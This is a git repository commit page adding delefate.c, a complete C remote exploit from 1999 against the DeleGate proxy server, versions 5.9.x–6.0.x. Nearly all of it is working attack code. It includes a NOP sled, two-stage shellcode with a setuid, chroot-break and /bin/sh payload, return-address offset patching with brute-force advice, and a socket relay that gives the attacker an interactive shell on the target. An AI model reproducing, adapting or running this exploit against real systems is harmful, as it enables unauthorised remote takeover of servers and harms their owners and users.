summaryrefslogtreecommitdiff
path: root/exploits/7350delefate
diff options
context:
space:
mode:
authorSkyperTHC2026-03-03 06:28:55 +0000
committerSkyperTHC2026-03-03 06:28:55 +0000
commit5d3573ef7a109ee70416fe94db098fe6a769a798 (patch)
treedc2d5b294c9db8ab2db7433511f94e1c4bb8b698 /exploits/7350delefate
parentc6c59dc73cc4586357f93ab38ecf459e98675cc5 (diff)
packetstorm sync
Diffstat (limited to 'exploits/7350delefate')
-rw-r--r--exploits/7350delefate/delefate.c325
1 files changed, 325 insertions, 0 deletions
diff --git a/exploits/7350delefate/delefate.c b/exploits/7350delefate/delefate.c
new file mode 100644
index 0000000..716d155
--- /dev/null
+++ b/exploits/7350delefate/delefate.c
@@ -0,0 +1,325 @@
1/* delefate.c
2 * delegate 5.9.x - 6.0.x remote exploit
3 *
4 * public
5 *
6 * will open a shell with the privileges of the nobody user.
7 *
8 * 1999/13/11 by scut of teso [http://teso.scene.at/]
9 *
10 * word to whole team teso, ADM, w00w00, beavuh and stealth :).
11 * special thanks to xdr for donating a bit of his elite debugging skillz.
12 */
13
14#include <sys/types.h>
15#include <sys/time.h>
16#include <sys/socket.h>
17#include <netinet/in.h>
18#include <arpa/inet.h>
19#include <unistd.h>
20#include <errno.h>
21#include <stdlib.h>
22#include <stdio.h>
23#include <string.h>
24#include <fcntl.h>
25#include <netdb.h>
26
27
28#define XP_OFFSET 0xbfffe074 /* offset */
29unsigned long int xp_off = XP_OFFSET;
30
31/* you don't have to modify this :) i hope :)
32 */
33#define XP_NETWORK_FD 12
34#define XP_NETWORK_OFFSET 0x00000101 /* fixed relative network socket offset */
35#define XP_SHELLCODE_OFFSET 0x00000104 /* fixed relative retaddr offset */
36#define XP_DIFF 0x0000000e /* 14 bytes after XP_OFFSET starts the shellcode */
37
38#define XP_SH2_FD1 0x00000011
39#define XP_SH2_FD2 0x0000001d
40#define XP_SH2_FD3 0x0000002a
41
42
43#define GREEN "\E[32m"
44#define BOLD "\E[1m"
45#define NORMAL "\E[m"
46#define RED "\E[31m"
47
48/* local functions
49 */
50void usage (void);
51void shell (int socket);
52unsigned long int net_resolve (char *host);
53int net_connect (struct sockaddr_in *cs, char *server,
54 unsigned short int port, int sec);
55
56
57/* because the buffer is rather small (256 bytes), we use a minimalistic
58 * read() shellcode to increase the chances to hit a correct offet
59 */
60unsigned char shellcode1[] =
61 "\x77\x68\x6f\x69\x73\x3a\x2f\x2f\x61\x20\x62\x20\x31\x20\x90\x90"
62 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
63 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
64 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
65 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
66 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
67 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
68 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
69 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
70 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
71 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
72 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
73 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
74 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
75 "\x90\x90\x90\x90\x90\x90"
76
77 /* 30 byte read() shellcode by scut */
78 "\x33\xd2\x33\xc0\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x80\xc2"
79 "\x10\x03\xca\xc1\xc2\x04\xb0\x03\x33\xdb\xb3\x0c\xcd\x80"
80 /* ^^ network fd */
81 "\x82\xe0\xff\xbf" /* return address */
82
83 "\x0d\x0a";
84
85
86/* uid+chroot-break+shell shellcode by lamerz, thanks !
87 * slightly modified by scut to take care of the network socket
88 */
89unsigned char shellcode2[]=
90 "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x89\xd9"
91 "\xb3\x0c\xb0\x3f\xcd\x80\x31\xc0\x31\xdb\x89\xd9\xb3\x0c\x41\xb0"
92 "\x3f\xcd\x80\x31\xc0\x31\xdb\x89\xd9\xb3\x0c\x41\x41\xb0\x3f\xcd"
93 "\x80\x31\xc0\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e"
94 "\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x27"
95 "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d"
96 "\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c"
97 "\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d"
98 "\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07"
99 "\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b"
100 "\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30"
101 "\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x6e\x67";
102
103
104void
105usage (void)
106{
107 printf (GREEN BOLD "delefate - delegate 5.9.x, 6.0.x remote" NORMAL "\n"
108 "by " BOLD "scut" NORMAL " of " RED BOLD "team teso" NORMAL "\n\n"
109
110 "usage.... : ./delefate <host> <port> [offset-add]\n"
111 "example.. : ./delefate localhost 8080 -100\n\n"
112 "for brute forcing, try from -2000 to 500 in steps of 200\n\n");
113
114 exit (EXIT_FAILURE);
115}
116
117int
118main (int argc, char **argv)
119{
120 int socket;
121 char *server;
122 struct sockaddr_in sa;
123 unsigned short int port_dest;
124 unsigned char *retaddr_ptr;
125 unsigned long int offset;
126 unsigned char *stack = NULL;
127
128 if (argc < 3)
129 usage ();
130
131 printf (GREEN BOLD "delefate 5.9.x - 6.0.x remote exploit" NORMAL "\n"
132 "by " BOLD "scut" NORMAL " of " RED BOLD "team teso" NORMAL "\n\n");
133
134 if (argc == 4) {
135 long int xp_add = 0;
136
137 if (sscanf (argv[3], "%ld", &xp_add) != 1) {
138 usage ();
139 }
140 xp_off += xp_add;
141 }
142 printf (" " GREEN "-" NORMAL " using offset 0x%08x\n", xp_off);
143
144 server = argv[1];
145 port_dest = atoi (argv[2]);
146
147 /* do the offset
148 */
149 retaddr_ptr = shellcode1 + XP_SHELLCODE_OFFSET;
150 offset = xp_off + XP_DIFF;
151 *retaddr_ptr = (offset & 0x000000ff) >> 0;
152 *(retaddr_ptr + 1) = (offset & 0x0000ff00) >> 8;
153 *(retaddr_ptr + 2) = (offset & 0x00ff0000) >> 16;
154 *(retaddr_ptr + 3) = (offset & 0xff000000) >> 24;
155 *(shellcode1 + XP_NETWORK_OFFSET) = (unsigned char) XP_NETWORK_FD;
156 *(shellcode2 + XP_SH2_FD1) = (unsigned char) XP_NETWORK_FD;
157 *(shellcode2 + XP_SH2_FD2) = (unsigned char) XP_NETWORK_FD;
158 *(shellcode2 + XP_SH2_FD3) = (unsigned char) XP_NETWORK_FD;
159
160 printf (" " GREEN "-" NORMAL " connecting to " GREEN "%s:%hu" NORMAL "...", server, port_dest);
161 fflush (stdout);
162
163 socket = net_connect (&sa, server, port_dest, 45);
164 if (socket <= 0) {
165 printf (" " RED BOLD "failed" NORMAL ".\n");
166 perror ("net_connect");
167 exit (EXIT_FAILURE);
168 }
169 printf (" " GREEN BOLD "connected." NORMAL "\n");
170
171 /* send minimalistic read() shellcode */
172 printf (" " GREEN "-" NORMAL " sending first shellcode...\n");
173 write (socket, shellcode1, strlen (shellcode1));
174 sleep (1);
175
176 /* now send the real shellcode :-) */
177 printf (" " GREEN "-" NORMAL " sending second shellcode...\n");
178 write (socket, shellcode2, strlen (shellcode2));
179
180 printf (" " GREEN "-" NORMAL " spawning shell...\n\n");
181 shell (socket);
182 close (socket);
183
184
185 exit (EXIT_SUCCESS);
186}
187
188unsigned long int
189net_resolve (char *host)
190{
191 long i;
192 struct hostent *he;
193
194 i = inet_addr (host);
195 if (i == -1) {
196 he = gethostbyname (host);
197 if (he == NULL) {
198 return (0);
199 } else {
200 return (*(unsigned long *) he->h_addr);
201 }
202 }
203
204 return (i);
205}
206
207
208/* original version by typo, modified by scut
209 */
210
211void
212shell (int socket)
213{
214 char io_buf[1024];
215 int n;
216 fd_set fds;
217
218 while (1) {
219 FD_SET (0, &fds);
220 FD_SET (socket, &fds);
221
222 select (socket + 1, &fds, NULL, NULL, NULL);
223 if (FD_ISSET (0, &fds)) {
224 n = read (0, io_buf, sizeof (io_buf));
225 if (n <= 0)
226 return;
227 write (socket, io_buf, n);
228 }
229
230 if (FD_ISSET (socket, &fds)) {
231 n = read (socket, io_buf, sizeof (io_buf));
232 if (n <= 0)
233 return;
234 write (1, io_buf, n);
235 }
236 }
237}
238
239
240int
241net_connect (struct sockaddr_in *cs, char *server,
242 unsigned short int port, int sec)
243{
244 int n, len, error, flags;
245 int fd;
246 struct timeval tv;
247 fd_set rset, wset;
248
249 /* first allocate a socket */
250 cs->sin_family = AF_INET;
251 cs->sin_port = htons (port);
252 fd = socket (cs->sin_family, SOCK_STREAM, 0);
253 if (fd == -1)
254 return (-1);
255
256 cs->sin_addr.s_addr = net_resolve (server);
257 if (cs->sin_addr.s_addr == 0) {
258 close (fd);
259 return (-1);
260 }
261
262 flags = fcntl (fd, F_GETFL, 0);
263 if (flags == -1) {
264 close (fd);
265 return (-1);
266 }
267 n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
268 if (n == -1) {
269 close (fd);
270 return (-1);
271 }
272
273 error = 0;
274
275 n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
276 if (n < 0) {
277 if (errno != EINPROGRESS) {
278 close (fd);
279 return (-1);
280 }
281 }
282 if (n == 0)
283 goto done;
284
285 FD_ZERO(&rset);
286 FD_ZERO(&wset);
287 FD_SET(fd, &rset);
288 FD_SET(fd, &wset);
289 tv.tv_sec = sec;
290 tv.tv_usec = 0;
291
292 n = select(fd + 1, &rset, &wset, NULL, &tv);
293 if (n == 0) {
294 close(fd);
295 errno = ETIMEDOUT;
296 return (-1);
297 }
298 if (n == -1)
299 return (-1);
300
301 if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
302 if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
303 len = sizeof(error);
304 if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
305 errno = ETIMEDOUT;
306 return (-1);
307 }
308 if (error == 0) {
309 goto done;
310 } else {
311 errno = error;
312 return (-1);
313 }
314 }
315 } else
316 return (-1);
317
318done:
319 n = fcntl(fd, F_SETFL, flags);
320 if (n == -1)
321 return (-1);
322
323 return (fd);
324}
325